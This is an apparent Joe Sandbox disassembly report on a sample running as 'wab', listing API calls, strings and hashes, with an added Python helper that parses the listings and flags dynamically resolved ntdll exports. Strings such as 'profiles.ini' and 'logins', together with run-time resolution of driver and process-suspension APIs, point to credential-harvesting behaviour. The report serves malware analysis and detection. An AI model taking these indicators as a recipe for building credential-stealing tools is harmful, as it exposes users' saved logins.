• Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
• Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%
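The function above resolves eight ntdll exports (NtQuerySystemInformation, NtLoadDriver, NtUnloadDriver, NtOpenSymbolicLinkObject, NtQuerySymbolicLinkObject, NtQueryObject, NtSuspendProcess, NtResumeProcess) through GetModuleHandleW/GetProcAddress instead of importing them, which is what the "Contains functionality to dynamically determine API calls" signature in the overview refers to. The Python helper below is an added example, not part of this Joe Sandbox report and not code from the sample: it parses "APIs" lines in the shape used throughout this report (`Name.MODULE(args), ref: address`, optionally prefixed with `Part of subcall function XXXXXXXX:`), extracts the export names handed to GetProcAddress, and matches them against a watchlist that is an assumption of the example, not a Joe Sandbox rule. The embedded sample lines are copied from the listings on this page so the script runs offline.

```python
import re

# Constructed sample in the exact shape of this report's "APIs" lines (taken from the
# ntdll resolution function at 00413542-004135D7 plus one subcall line and one
# argument-less MSVCRT line); embedded so the example runs without the report file.
SAMPLE_API_LINES = """
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• memset.MSVCRT ref: 0040DBCD
"""

# One report line: optional subcall prefix, API.MODULE, optional (args), ", ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# Assumed watchlist for this example: groups of native APIs whose joint dynamic
# resolution is worth a second look. Not a Joe Sandbox signature.
WATCHLIST = {
    "process-suspend-resume": {"NtSuspendProcess", "NtResumeProcess"},
    "driver-load-unload": {"NtLoadDriver", "NtUnloadDriver"},
    "object-enumeration": {"NtQuerySystemInformation", "NtQueryObject"},
}


def parse_api_lines(text):
    """Turn report 'APIs' lines into records; headings and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args") or ""
        args = [a for a in raw_args.split(",") if a != ""]
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return records


def resolved_exports(records):
    """Export names passed to GetProcAddress, in call order.

    Joe Sandbox prints recovered arguments only, so the name may be the first or the
    second argument; pick the last argument that is neither '?' nor an 8-digit hex
    literal (which would be a module handle or an ordinal)."""
    names = []
    for r in records:
        if r["api"] != "GetProcAddress":
            continue
        candidates = [a for a in r["args"] if a != "?" and not HEX8.match(a)]
        if candidates:
            names.append(candidates[-1])
    return names


def flag_capabilities(names):
    """Watchlist groups fully covered by the resolved export names, sorted."""
    present = set(names)
    return sorted(group for group, apis in WATCHLIST.items() if apis <= present)


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE_API_LINES)
    exports = resolved_exports(recs)
    print(f"{len(recs)} API calls parsed, {len(exports)} exports resolved dynamically")
    for name in exports:
        print("  ", name)
    print("flagged:", flag_capabilities(exports))
```

To run it against a real report, feed the text of an "APIs" block (or the whole page) to `parse_api_lines`; the regex ignores the "Strings", "Memory Dump Source" and "Similarity" lines, so no pre-cleaning is needed. The `subcall` field lets you separate calls made directly by the function from those the plugin attributes to a callee.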

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                                                                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                          • String ID: logins$null
                                                                                                                                                                                                          • API String ID: 3492182834-2163367763
